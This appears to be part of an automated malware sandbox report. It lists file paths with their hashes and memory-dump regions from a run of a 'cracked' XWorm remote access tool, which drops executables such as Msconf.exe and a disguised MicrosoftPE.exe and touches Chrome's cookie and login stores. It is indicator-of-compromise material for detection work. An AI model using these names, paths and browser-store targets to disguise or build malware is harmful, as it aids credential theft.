| SHA512 | b4e5f112d818809cb1187466a4e5abd4ab34dc4550da10ad04a9da95c1061b8faebd31d5313d2e3f46753503a5a813c5605d4ea1b521c15c43a74b341ea04618 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a3334113c82c003472539f5c9bf8cd01 |
| SHA1 | db8a90e72f0355cadc415bf6302688c771fb69dd |
| SHA256 | 08b090d6e6f76fe57aadae0e42ea2a71aca5bdc15645beaa58cad205c2388c38 |
| SHA512 | 0beadf269e8fef5a08eaa7d98a18dd384334f8ee71425760f0da22d6fdb00794956acd8fbca1fa4850c0e2afb7b37bf0aefe95d157dbb1ffd0cbbd33bf3cf8e9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018
| MD5 | 888c6d4bec99f675f71ab341537afe71 |
| SHA1 | 5175d644c2033db4aae70c2dfadf3893eaa0c591 |
| SHA256 | 0f369947e2e9a9505a6919f3bf20e6b4f72cefe3fd95c12755ac2a8e5aa445c7 |
| SHA512 | a00f9368fd6b4d02fc77a8e85de97bdc08ddfb7fb8c94744386b0de6b7b7c30be33d7ab67ebc2059f207869ba7e70c0b0251d62769b7c604690b5a500e61352c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a
| MD5 | 49943bc015e9713f646c021a2f9a7f48 |
| SHA1 | 7bcd637eb823b04c425775fa8c914e8b8f2ac2a5 |
| SHA256 | f6e0b13ad81727a0d9317a3049fd06ecf2c473060e9d6e4f8eb564a1d82ad289 |
| SHA512 | 2203c2dbe9482b0b351a3f70ea0ba9f63dcc87a66d4a4db63a060dd7dd04cb73a73bced407d57c2bcf26cf7ed78b18c7555c87b22db9bd744cb6491cd040305d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d
| MD5 | a4dea6cc921b1ce93c5697daf4d6a1da |
| SHA1 | 32319d2548ef3c892a66011de41e0e8574d57f38 |
| SHA256 | 0a54fe616e569becbb69893e62ee9aa8bd4166068008ba728041811c4c58993c |
| SHA512 | 62dc0f737b08d5b569ee7450692c22f334247b87aaa67e3157a362aa311671b62e2c2ffd5528d5464c13e5e64c4fcd88711d6f4acba6b1b0e71de0ba13599abe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028
| MD5 | b80faadac56b77cc0bcf9db6dd78ccef |
| SHA1 | 7d85faa2cd3d34c60896905d82891b453e156ff4 |
| SHA256 | 5b18ee41a632eab51fb6e0af1a97a782ab26f4c53b8e4389ff3d0544e7540e8e |
| SHA512 | 0704c18ef6b9673f97c823598bebc897d8f4de25470787d3474e352fd2e4911e50b2f58a8cef72f08cc62f33e29a552d029361bfca0d2f4ee57f54f838e42409 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 265ef8a8352f7e50da149fc52fcb19f0 |
| SHA1 | 474686000cc3b0d633c1e7bbba4f449df23155b9 |
| SHA256 | c6134667bb34fe847a23dd8e99f86f2c14fe657f69c40a35b3504374d22bf10d |
| SHA512 | 48ffd52dcbfbc5bfbbcb11e3ec82ba4ac596ea0a517b323bbf6e7af9004918876074f0a105be0d6d5c2bcdaae371b6229df48d8a4a79b1d188c8c7da2f72c396 |
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-CRACKED-main.zip.crdownload
| MD5 | 0fb7dc8b05e80c22e6739301eaa9872e |
| SHA1 | 927a3beda570e906ba6e5b551a234f694d2c3e81 |
| SHA256 | 2bf8bf4050c1d52a3cd29295c6e29e3e45cdb72d2dc8e9b3c6c3e1dc80828cbb |
| SHA512 | 44e395e3f3ed7a82b0e3c7b2ca61ff10caa2825e54f5e572c100aa8063569b5ad96fd85a50e6661bd4c9b8b67d505d4b76c7e9e8b01d1658cd5854e446d87642 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 071b6cf77c60e7a9b8e7514120613c43 |
| SHA1 | da9554f67ebdc46e7748bcfdbb3498bdde0eb17b |
| SHA256 | a914b0b2e08a8997013518630a2c0a5dedd8f5660ad4fbcb5f5891708b4213cd |
| SHA512 | 37005135f744ff811fde5ec56e855656adf323a006032e392a89134ca8b4982e623a75c6c535613f045146079f1e7c6d00dcc77258c7ca803ccf312c1f763a0f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 83922a8ea9eef4cce193206e19938621 |
| SHA1 | f2c21ede1005d2723cff55acbb356849bbe236e4 |
| SHA256 | cbb20bc447915b5f76f912f20459461d1e74e411561017645101e88bf9e6b776 |
| SHA512 | f65eb38fb348615863ddf2d87c5ffdbff93dc625b60a5670a398d045678b629c9a5895dc9cffe7262b3711aa9981ef8f60d92a61257222801eb37f386fa4abbf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e9f74560bcf6741a19d21fde5ef4ed83 |
| SHA1 | d57bb0d5a402db39b39db7b4fbb3e8292aca7721 |
| SHA256 | 8239f3bba2c806c7c9486566081e96f08c886a78a01c42d855b1c2f5eb20ffaf |
| SHA512 | c816139109550ff10bbe0e0f98cdc1e880c0b4fea31bcacf2c8eb4e521c6fe5dea9de0be82249f2a1c18c063814d1ac5753aca2369d2f0963229e29e0e33401a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 20706291903dfe73bbe85ea8e8fab4be |
| SHA1 | 2e47f111b0e6ab81c76ee1903ad5b45321e573da |
| SHA256 | fd43d3c76bdc851d8f5ad28fa74283e8b1c8b8767072d4ec79818a4de1a4ff39 |
| SHA512 | f8803eb0717f6d8024b5b01034a550621e91bc9ab196c6776652847e35caccd11e4abfb6ed35564e44df4b902ce7b7f7cd71cb949f534d7c0d77f076a2ba1475 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 041e68b6b477edbd0ee4c22417c2512e |
| SHA1 | 47bdaa954807ade7aa87a730434f476aff2a7d24 |
| SHA256 | e27fb09cea4650ae559ed857faf85897123fa1e4cf25f54354837ba490750e64 |
| SHA512 | 9f79154266e56b51bf5f166b890665c24e19080453b6c148c13f35779cc341c6c9c5a1ecb4e0c0581c5623e3bd026bec0bcb00d06cc1e5d200d6c6f8250413cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 285e35e9458e1e2eb975984de221330f |
| SHA1 | aef6d59209becaa569291e4580f2522e8437a362 |
| SHA256 | fd3d04e4c0e47bb6da36bbbf476b0f61e349661e426cf218dc386e702547dc13 |
| SHA512 | 9d91ab7192081c93cdc82822fdc04ef34e63305f5328ca004738e548974311e3724f2c5063e916c3bfe0577bd699f96b283f2913890504a552cc8d24533ffc47 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5dd583.TMP
| MD5 | 26dfb4e8b3726b9c9c61e91006b5a0a0 |
| SHA1 | 2ac41c6d18726c44c0431fd354dd0ddda9ac18cf |
| SHA256 | 2f4cfdb00974e1ba0a50cd88eb976241e8028b4c8dff186f02e42acdd355f85d |
| SHA512 | c71a55b17cb077fd723ff818197815cde6a16bd3c9e7fce83ed6ef4b01818eef90b21f6263db5679a955f6bbd935e4fd6acf47fd65910e9bd5b2830767a0cd9a |
C:\Users\Admin\AppData\Local\Temp\Untitled.png
| MD5 | af7a3d1f644ecc07448b980fa3cfaf89 |
| SHA1 | 239bd472b058ca51ff07046e0406de092f0e0fe4 |
| SHA256 | d6d48ed0eca5924a039897b7fb4f2a27f1e1b37ee28691dd37077746d1796327 |
| SHA512 | dd7b8c43046a18755698f568e2f25258acaccda40f2f74b6058d8f6689b0c52fca9a5c17ba39e0add835436ca38655da499590bf1ef8543807470174c82912ee |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | b5aecd6587a7f8e1498143e7134ed160 |
| SHA1 | 7c03172aa85060dd6dc14efa243a6fcdbd025d42 |
| SHA256 | 72ce5bf77439afbf088458c9e342391871cc019b8051d8247f8fe76522f9ab49 |
| SHA512 | daeb8f36b0b4eda2e403a7afc43df957eec9b5873bb3a94611dfa8972291c27b1a6a38a5a29fbacd218514580fefac3dedf3d62e27a711b9ebc7719a5703aad6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 32986e02488421f1cfb241ed1bc43fd3 |
| SHA1 | 1bf9fda4c371f25cb2d73e1f1eb88edaeeaab90b |
| SHA256 | 1bdb163c570b290034793f8c74acf3025adbe810a204638760c910044d769496 |
| SHA512 | 438b9b0988926b5293637f36819a53eec0afbc4b44448abcc2731bdaf9cf780dddf15bfa4a5d7fcf523913e5904d8cd1f4af8c418cb6541fe538a2b63a9d1b6c |
memory/2120-713-0x0000000000400000-0x000000000040A000-memory.dmp
memory/2120-717-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/2120-724-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/2684-727-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/2684-729-0x0000000006440000-0x0000000006476000-memory.dmp
memory/2684-730-0x0000000006590000-0x00000000065A0000-memory.dmp
memory/2684-728-0x0000000006590000-0x00000000065A0000-memory.dmp
memory/2684-731-0x0000000006BD0000-0x00000000071F8000-memory.dmp
memory/2684-732-0x0000000006A10000-0x0000000006A32000-memory.dmp
memory/2684-733-0x00000000072E0000-0x0000000007346000-memory.dmp
memory/2684-734-0x0000000007270000-0x00000000072D6000-memory.dmp
memory/2684-735-0x0000000007540000-0x0000000007890000-memory.dmp
memory/2684-737-0x0000000007910000-0x000000000795B000-memory.dmp
memory/2684-736-0x0000000007250000-0x000000000726C000-memory.dmp
memory/2684-738-0x0000000007CA0000-0x0000000007D16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvqupxp0.iw1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2684-753-0x0000000008A40000-0x0000000008AD4000-memory.dmp
memory/2684-754-0x00000000089D0000-0x00000000089EA000-memory.dmp
memory/2684-755-0x0000000008AE0000-0x0000000008B02000-memory.dmp
memory/2684-756-0x00000000092D0000-0x00000000097CE000-memory.dmp
memory/2684-778-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/3420-780-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/3420-782-0x0000000006A80000-0x0000000006A90000-memory.dmp
memory/2684-781-0x0000000071440000-0x000000007148B000-memory.dmp
memory/2684-784-0x0000000009130000-0x000000000914E000-memory.dmp
memory/2684-785-0x000000007F280000-0x000000007F290000-memory.dmp
memory/3420-783-0x0000000006A80000-0x0000000006A90000-memory.dmp
memory/2684-779-0x0000000009150000-0x0000000009183000-memory.dmp
memory/2684-790-0x0000000009190000-0x0000000009235000-memory.dmp
memory/2684-791-0x0000000006590000-0x00000000065A0000-memory.dmp
memory/2684-792-0x0000000006590000-0x00000000065A0000-memory.dmp
memory/3420-880-0x0000000009900000-0x0000000009F78000-memory.dmp
memory/3420-889-0x0000000009330000-0x00000000093C2000-memory.dmp
memory/2684-1014-0x0000000009270000-0x000000000928A000-memory.dmp
memory/2684-1019-0x0000000009260000-0x0000000009268000-memory.dmp
memory/3420-1028-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/3420-1033-0x0000000006A80000-0x0000000006A90000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Msconf.exe
| MD5 | 209696204823161c334df0a7e580fb11 |
| SHA1 | 4b1abe943f4bb9d5b6f94cdb12a65ec9a2470701 |
| SHA256 | 99c29c9845e9f03eb4d53ce6ed66c1771a59a82f1321688d367880b63eebccff |
| SHA512 | 7ce0a76d2868b1b18b679b1429c7993c20105af55311907540bd5ff057ca47de65229a9e9a9937e71b49a38a1dbb439cf72350520aae79e71fdd4b236a3c3c9c |
memory/3420-1048-0x0000000006A80000-0x0000000006A90000-memory.dmp
memory/2684-1051-0x000000007F280000-0x000000007F290000-memory.dmp
memory/3420-1056-0x0000000006A80000-0x0000000006A90000-memory.dmp
memory/3420-1059-0x0000000006A80000-0x0000000006A90000-memory.dmp
memory/2684-1060-0x0000000006590000-0x00000000065A0000-memory.dmp
\??\c:\users\admin\appdata\local\temp\msconf.exe
| MD5 | 209696204823161c334df0a7e580fb11 |
| SHA1 | 4b1abe943f4bb9d5b6f94cdb12a65ec9a2470701 |
| SHA256 | 99c29c9845e9f03eb4d53ce6ed66c1771a59a82f1321688d367880b63eebccff |
| SHA512 | 7ce0a76d2868b1b18b679b1429c7993c20105af55311907540bd5ff057ca47de65229a9e9a9937e71b49a38a1dbb439cf72350520aae79e71fdd4b236a3c3c9c |
C:\Users\Admin\AppData\Local\Temp\msvcp.exe
| MD5 | 31e8d69dd9c3558923e1530edcf9b4b2 |
| SHA1 | 5122fbe6ed78fcf74255f45bc892c6d027cde848 |
| SHA256 | fd0f3f8df108954750e72aac6eebded811858769d0aff1a065b1a86ecb7c6eb8 |
| SHA512 | 1f1c898bc59eac8c58d6174fbdde07c1fd3b320241ef34f1e271eb76ad9e4683dd76b8cae56c5e53b4c2c3edf7c6c6b72314feaabce060e96869076123606a66 |
memory/3420-1069-0x0000000073A30000-0x000000007411E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\softprotect.bat
| MD5 | 4c35b71d2d89c8e8eb773854085c56ea |
| SHA1 | ede16731e61348432c85ef13df4beb2be8096d9b |
| SHA256 | 3efeeaaabfd33ff95934bee4d6d84e4ecb158d1e7777f6eecd26b2746991ed42 |
| SHA512 | a6ccbb2913738ca171686a2dd70e96330b0972dadb64f7294ac2b4c9bb430c872ed2bcd360f778962162b9e3be305836fa7f6762b46310c0ad4d6ef0c1cdac8d |
C:\Users\Admin\AppData\Local\Temp\PL.exe
| MD5 | ac5a067a49c0347a26cb08dbf77f45b2 |
| SHA1 | 961323bf26e320183019c6a759373017fa1d1ec2 |
| SHA256 | c89c74a42dc7e8ba62490a3f73f031caec9ec3579bc69d169abc2bfd2e3719d2 |
| SHA512 | fecabc22397856af602384d99f017ecb2b3624d96ae6fcc95f34b860fcb8b4c94c6e957b120762499ea72de7ca9b0e628252196093ec12f57b176641b8c00d94 |
C:\Users\Admin\AppData\Local\Temp\msvcp.exe
| MD5 | 31e8d69dd9c3558923e1530edcf9b4b2 |
| SHA1 | 5122fbe6ed78fcf74255f45bc892c6d027cde848 |
| SHA256 | fd0f3f8df108954750e72aac6eebded811858769d0aff1a065b1a86ecb7c6eb8 |
| SHA512 | 1f1c898bc59eac8c58d6174fbdde07c1fd3b320241ef34f1e271eb76ad9e4683dd76b8cae56c5e53b4c2c3edf7c6c6b72314feaabce060e96869076123606a66 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 61767a68bc40287ea954afc4274f32d4 |
| SHA1 | b204d8b705540b521f97d12dcb875b1e85e7f440 |
| SHA256 | 2de45e724110d537ab58a190d8ffd7da3165ac5caef2a44d0b11b57bcac2c765 |
| SHA512 | 9e1e5098694861bfb55bd5419acc0d902dc9ddea87f3390b683f460627e1e2248e2d254c3de22960c931e2b02d8787216cb901fd0eb2ec073a4ad9f4338caf59 |
C:\Users\Admin\AppData\Roaming\MicrosoftServerContact\MicrosoftPE.exe
| MD5 | 31e8d69dd9c3558923e1530edcf9b4b2 |
| SHA1 | 5122fbe6ed78fcf74255f45bc892c6d027cde848 |
| SHA256 | fd0f3f8df108954750e72aac6eebded811858769d0aff1a065b1a86ecb7c6eb8 |
| SHA512 | 1f1c898bc59eac8c58d6174fbdde07c1fd3b320241ef34f1e271eb76ad9e4683dd76b8cae56c5e53b4c2c3edf7c6c6b72314feaabce060e96869076123606a66 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 97f6824ccb942d4817de3c7ac76ee90b |
| SHA1 | 3fce1e5d790be6bc538a0b706b1fbc2cc833dadb |
| SHA256 | cda18a97016eadacb21a3325f411311321b241ca4969c0436404ef1fb69af86a |
| SHA512 | eeead8ca5e18a0e2699a5e50af737f96aa8cba7e338d08b2ec1b9c53307c10097be0e07cb5b08d27dfd9302e7ff2bde0d47122e33e2d0b558b0e74421e7da9b4 |
\??\c:\users\admin\appdata\local\temp\pl.exe
| MD5 | ac5a067a49c0347a26cb08dbf77f45b2 |
| SHA1 | 961323bf26e320183019c6a759373017fa1d1ec2 |
| SHA256 | c89c74a42dc7e8ba62490a3f73f031caec9ec3579bc69d169abc2bfd2e3719d2 |
| SHA512 | fecabc22397856af602384d99f017ecb2b3624d96ae6fcc95f34b860fcb8b4c94c6e957b120762499ea72de7ca9b0e628252196093ec12f57b176641b8c00d94 |
memory/2684-1089-0x0000000073A30000-0x000000007411E000-memory.dmp
memory/2132-1090-0x0000000000400000-0x000000000045A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
| MD5 | 957779c42144282d8cd83192b8fbc7cf |
| SHA1 | de83d08d2cca06b9ff3d1ef239d6b60b705d25fe |
| SHA256 | 0d7ca7ba65e2b465e4878e324ceab8f8981f5ec06dcf5bc32559a4467a9c7d51 |
| SHA512 | f1549c61b4f2906d13b2aabb74772c2bc826cd42373d7bb6c48cbb125d5aa2ec17617e6b5e67e8aae3bb5790cc831cdba48a45008ed01df4fba8be448cce39fd |
memory/2132-1095-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/2132-1096-0x000000000BDA0000-0x000000000BDB0000-memory.dmp
memory/2132-1097-0x000000000BBC0000-0x000000000BBCA000-memory.dmp
memory/2132-1098-0x000000000CB50000-0x000000000D156000-memory.dmp
memory/2132-1099-0x000000000BDE0000-0x000000000BDF2000-memory.dmp
memory/2132-1100-0x000000000C540000-0x000000000C64A000-memory.dmp
memory/2132-1101-0x000000000BE50000-0x000000000BE8E000-memory.dmp
memory/2132-1102-0x000000000BE90000-0x000000000BEDB000-memory.dmp
memory/3508-1109-0x00007FF7356D0000-0x00007FF735C39000-memory.dmp
memory/2132-1272-0x000000000D680000-0x000000000D69E000-memory.dmp
memory/2132-1299-0x000000000D7E0000-0x000000000D830000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 071b6cf77c60e7a9b8e7514120613c43 |
| SHA1 | da9554f67ebdc46e7748bcfdbb3498bdde0eb17b |
| SHA256 | a914b0b2e08a8997013518630a2c0a5dedd8f5660ad4fbcb5f5891708b4213cd |
| SHA512 | 37005135f744ff811fde5ec56e855656adf323a006032e392a89134ca8b4982e623a75c6c535613f045146079f1e7c6d00dcc77258c7ca803ccf312c1f763a0f |
memory/2132-1309-0x000000000DA10000-0x000000000DBD2000-memory.dmp
memory/2132-1310-0x000000000E110000-0x000000000E63C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
| MD5 | 1f502b694e3cef15c932283798f1aedc |
| SHA1 | 72ee57dc6b1c3821f40a808910ff6b3c3c429d7d |
| SHA256 | 000accf565aafd861a35c1c9ab71a67b40efd33e3cf2b89dd53fd32568c648d9 |
| SHA512 | 1bd5ebce44ee88b08707f0fc76cf44a30aedfb684f0a564da0121ca7779c682f6f33781f62f9b6a0146259840b760c581ec8cbd316afb346b533f42ec022248d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 62ace2343adacb1ce27ea0a8086cd404 |
| SHA1 | 1b32abc6e3d09bd18444f8287835777490467799 |
| SHA256 | 1febd5fd7fb451bafa56064f2d8abb4263747b9fddd9118c948217ae1b4e7308 |
| SHA512 | af445da1515170f3189a269848e92969f44ac6a5bb8389e8e94061cdbf4244cec158beea08fd772b53026af74150061ff61c116622984fe973eb7ef1d4e8d6ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
| MD5 | 0ba18848ef8e495a562d8e0733035ba9 |
| SHA1 | 3c06ab59bff4b98c66e5ef443f17ae011389063b |
| SHA256 | 13169e07d4d395b2c99a3a680c03e2a0e02a2febe378de238b4c60960f66d84d |
| SHA512 | f9def4f6f86e685d6bdb1141ded02dd8c383ed40384dcd5c73e324b65492b088be65c16c2ee45e090c85435e3a792f462cb1aa9ae826856ce983cfba7892aa88 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | f732dbed9289177d15e236d0f8f2ddd3 |
| SHA1 | 53f822af51b014bc3d4b575865d9c3ef0e4debde |
| SHA256 | 2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93 |
| SHA512 | b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4 |
memory/4620-1351-0x00007FFB52F10000-0x00007FFB538FC000-memory.dmp
memory/4620-1354-0x0000015D412C0000-0x0000015D412D0000-memory.dmp
memory/4620-1360-0x0000015D412C0000-0x0000015D412D0000-memory.dmp
memory/2132-1358-0x0000000073AD0000-0x00000000741BE000-memory.dmp
memory/4620-1365-0x0000015D41260000-0x0000015D41282000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 61767a68bc40287ea954afc4274f32d4 |
| SHA1 | b204d8b705540b521f97d12dcb875b1e85e7f440 |
| SHA256 | 2de45e724110d537ab58a190d8ffd7da3165ac5caef2a44d0b11b57bcac2c765 |
| SHA512 | 9e1e5098694861bfb55bd5419acc0d902dc9ddea87f3390b683f460627e1e2248e2d254c3de22960c931e2b02d8787216cb901fd0eb2ec073a4ad9f4338caf59 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 041e68b6b477edbd0ee4c22417c2512e |
| SHA1 | 47bdaa954807ade7aa87a730434f476aff2a7d24 |
| SHA256 | e27fb09cea4650ae559ed857faf85897123fa1e4cf25f54354837ba490750e64 |
| SHA512 | 9f79154266e56b51bf5f166b890665c24e19080453b6c148c13f35779cc341c6c9c5a1ecb4e0c0581c5623e3bd026bec0bcb00d06cc1e5d200d6c6f8250413cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
| MD5 | fac38770fbdf093c3f8378ad143ad423 |
| SHA1 | 14e9b30d2c0d3f38ebabde754625405ddae7c284 |
| SHA256 | 91147e43e88d10c96bef89fda3b2f75c86e33b1407f4c7b74953c1fea6455569 |
| SHA512 | d89a874565244a5da72f4ac2157be292156a829c20dd4f22b7418f6c8c43e804d6a1f0c286e9af2e1c9ebfab1673c57225624d2b2f808540b182e687dcb137ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | ea90a77cf4fd1b46b9612b4004b27e84 |
| SHA1 | 2fc9dc97d99a3d0c7004e9011339e6ab9c172177 |
| SHA256 | dce977402e5a39be377f66daabc8ec8f93a256c20de62fc82e7ec18bb16a3c60 |
| SHA512 | a8a7f1e0578ffac63caa485aaa64c56adf0ae979536b349fdd09463f1d25f9224106e492397d695928e69ccb3b7be392b11a13041b0c5aef075db06e94653db8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 20706291903dfe73bbe85ea8e8fab4be |
| SHA1 | 2e47f111b0e6ab81c76ee1903ad5b45321e573da |
| SHA256 | fd43d3c76bdc851d8f5ad28fa74283e8b1c8b8767072d4ec79818a4de1a4ff39 |
| SHA512 | f8803eb0717f6d8024b5b01034a550621e91bc9ab196c6776652847e35caccd11e4abfb6ed35564e44df4b902ce7b7f7cd71cb949f534d7c0d77f076a2ba1475 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\DawnCache\data_1
| MD5 | ea90a77cf4fd1b46b9612b4004b27e84 |
| SHA1 | 2fc9dc97d99a3d0c7004e9011339e6ab9c172177 |
| SHA256 | dce977402e5a39be377f66daabc8ec8f93a256c20de62fc82e7ec18bb16a3c60 |
| SHA512 | a8a7f1e0578ffac63caa485aaa64c56adf0ae979536b349fdd09463f1d25f9224106e492397d695928e69ccb3b7be392b11a13041b0c5aef075db06e94653db8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log
| MD5 | 365199dd652e73e17bc603e871533b0c |
| SHA1 | 254123847e5bb66bab3a37b54d0961b777cd03e1 |
| SHA256 | cf9330306ca7b0c99f78f572826569a789ffc89be1fe5154c6129de2bd202d66 |
| SHA512 | fe62617781839e4bf9c050bbd8127953736a3d578f3573cd4f579a0cb64ba509354ac3a1abe362916090adb6181a32a1ccd101e0e37c7a34ed264a5739480fca |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG
| MD5 | f136b7212a13bf8dd83e38035c4ed589 |
| SHA1 | 04380149d4b0949c29d42d5c2cd46579234c5ae8 |
| SHA256 | 808bcc373215f2b0335e80df74ea8332430d9e3a675f1c7d79a827e818689647 |
| SHA512 | 2ee16de179c19f451a683a56f4e6702e13673a2e79eeff4e17a01091be4a771af638d9f389f4873379d613368c629d8e60b0e3084803cf5ff692dc569eacbe48 |
memory/2132-1410-0x000000000BDA0000-0x000000000BDB0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | ef387db73c6e8ccd6fb86e47424a43e1 |
| SHA1 | 447285dfeef5fe4f1e1d7957fb8cea8edf37f925 |
| SHA256 | 3b44ba930e9465387459160c6e909f63af355786f66eec21d4f10cea6a8cdedc |
| SHA512 | 0fd0c98637e8390afeae735de4c7aeddd69d63e01e19a4ff3ed5207479cdc48a009b900da9b809c0b19c124254ca1380faba6a8f35f9bfe78a23ffc020e34912 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 27dd778cce2b7efc4e5ae039c29b32ee |
| SHA1 | 4c3b9a061868928609ab940b320228273d5643dc |
| SHA256 | be36553dfb02c14670a270ecd64df66665faa2d7f0b4194aa6b1347a462c2fa3 |
| SHA512 | 87876463ebf9c316e35d76d3d77243c7e8aacc1c119a5e608e2229c4968e32b81437fd4ece7b50ded62e06a62390b1f4c4ff7eb7d3b665d3dd7fd47cb28df25a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | 53437fb7cd694219f3882aad6d577d16 |
| SHA1 | d5db88b2283ecc09a38920bf454d55b8c0351d0d |
| SHA256 | cd689cd934f7469a07606ed7cfad18cf6601d6df995dc5fa11a3c15a3075cd09 |
| SHA512 | c1c401b4e5844b8a638147a7a8854b24ca4783688315100101a3a1a4cacdd448a658c5a2e5fb464b1a62807670eaa44b1dab4ae323d1dd8c8bcc3de85a0d13d1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | f1940025a9dea04e09beee956c54ce05 |
| SHA1 | f81ce617158eda03dc3d7bce66994ef6830e84f8 |
| SHA256 | 5823b9a9d186fe0f0c6bd2442ea34c9ed6296b1dd8ea6c6be741da8f420d5425 |
| SHA512 | 898be7ce7ddc643e8000f2a246e4e9f770bbce8a5ed24025a4a23b6b9dceee29743742058359a2497b6233278ca156c5a0c310fddf00f3c36833467adb339789 |
memory/4620-1393-0x0000015D41550000-0x0000015D415C6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Visited Links
| MD5 | 8632d8a6075c48954f01742cb54ff5f5 |
| SHA1 | 024f285c4b1fbd415286132fcf9a9ea42f69a6ac |
| SHA256 | 8fcd3f9e2203e324a72cc906b7369d30b0c3999a014564de018d2730c7c29319 |
| SHA512 | e186d3e4e6b9f4cd7fd2c58063a4170ba09af9e2e6ae387c97ca43280e9c6f22192fc1d94d5c08408fafd3a472845d16563aedecf11160d823cdae0cff9f71e3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13339603548983892
| MD5 | 620c6ec643b1e7f5ddc318abb700d61b |
| SHA1 | 00da30ae695e9286d2beb51abeaff7a84ec504b0 |
| SHA256 | 89016dec07dba533829218863e4549f5f527c42c4ca64ff1ac8dfe3b648f9de1 |
| SHA512 | a982a186abe5b9cd41661840c84f5109b1259710fb0143b9ecd6e55158eba0275eb9081c41ab3e991a7bffed84e1e3211f4df7276976d9b7c5a218887af2f127 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
| MD5 | d03fa1d06e0cdbf8bcc7c91074769a3a |
| SHA1 | f312a4abac3676b325a228a429d52e241a47e410 |
| SHA256 | e081de80264e7ba1c45cc77ac0b6799251ff9932e26943a13c38966b45b86ceb |
